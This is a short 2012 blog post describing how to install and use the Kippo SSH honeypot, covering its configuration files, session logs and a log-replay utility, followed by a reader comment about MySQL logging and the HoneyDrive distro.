Saturday
Oct132012
TekTip ep11 - Kippo SSH Honeypot
Saturday, October 13, 2012 at 11:30PM Description: Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker
Uses: Alert to potiential threats, watch how hackers operate, gather exploits and malware
Installation:
http://bruteforce.gr/honeybox Honeybox is a distro that contains numerous honeypot software, all on a single box. Additionally, the distro preconfigures the honeypot to utilize some of the many enhancements Brutforce Labs have created for these honeypots.
*If at home, to make this accessible from the internet you will need to enable port forwarding at your modem, and potientially your Virtual Machine software.
Usage:
kippo/kippo.cfg : Main configuration file
kippo/honeyfs : This is the fake filesystem that wll be presented to the user.
kippo/data/userdb.txt : This file allows us to modify the username and password combinations that will work when attackers attempt to log into the honeypot.
kippo/log/tty/ : In this directory you will find the logs for each session established by attackers.
./start.sh
- will start kippo
/kippo/utils/playlog.py : Replay an attacker session from the kippo/log/tty directory.
Usage: playlog.py [-bfhi] [-m secs] [-w file] <tty-log-file>
-f keep trying to read the log until it's closed
-m <seconds> maximum delay in seconds, to avoid boredom or fast-forward to the end. (default is 3.0)
-i show the input stream instead of output
-b show both input and output streams
-c colorify the output stream based on what streams are being received
-h display this help
i.e.
~/kippo/utils/playlog.py 20121012-115031-8544.log
1aN0rmus@tekdefense.com
tagged 1aN0rmus, Bruteforce lab, Cyber, Honeybox, Kippo, Medium Interactive, Network Security, brute force, honeypot, shell, ssh, tekdefense in TekTip
1aN0rmus, Bruteforce lab, Cyber, Honeybox, Kippo, Medium Interactive, Network Security, brute force, honeypot, shell, ssh, tekdefense in TekTip
Reader Comments (1)
Hello Ian. Great video and thanks for the mention about BruteForce Lab. You should also explore the MySQL logging capabilities of Kippo (check: http://bruteforce.gr/logging-kippo-events-using-mysql-db.html), so you can visualize the results with a tool like Kippo-Graph. You'll find it interesting, I assure you. About the HoneyBox project, its renamed to HoneyDrive (just FYI) and I plan to update it very soon with new software, or create a desktop version (lightweight, probably xubuntu or lubuntu based) so GUI-tools can be included as well. Let me know if you have any suggestions, etc. Have a nice day.